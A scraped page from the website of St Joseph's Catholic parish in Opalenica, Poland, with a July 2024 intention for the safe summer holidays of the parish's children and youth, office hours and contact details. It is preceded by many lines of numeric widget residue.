1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 0
1 0
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 0
1 0
1 1
1 0
1 1
1 1
1 1
1 1
1 0
1 1
1 1
1 1
1 1
1 1
1 0
1 0
1 1
1 0
1 0
1 1
1 0
1 1
1 0
1 1
1 1
1 0
1 1
1 0
1 1
1 0
1 1
1 0
1 0
1 0
1 1
1 1
1 0
1 0
1 1
1 1
1 1
1 0
1 1
1 0
1 1
1 0
1 0
1 1
1 1
1 1
1 0
1 1
1 1
1 1
1 1
1 1
1 1
1 0
1 0
1 1
1 1
1 0
1 0
1 1
1 0
1 1
1 0
1 1
1 1
1 1
1 1
1 0
1 1
1 0
1 0
1 0
1 1
1 1
1 0lipiec 2024
O bezpieczne przeżycie czasu wakacji dla dzieci i młodzieży naszej parafii


Biuro parafialne
czynne w dni powszednie
po rannej i wieczornej Mszy św.


Strona przygotowana i zarządzana przez:

Parafia Rzymskokatolicka
p.w. św. Józefa w Opalenicy


ul. Powstańców Wlkp. 2a
64-330 Opalenica

telefony kontaktowe:

PROBOSTWO: 61 4477468
WIKARIAT: 61 4478138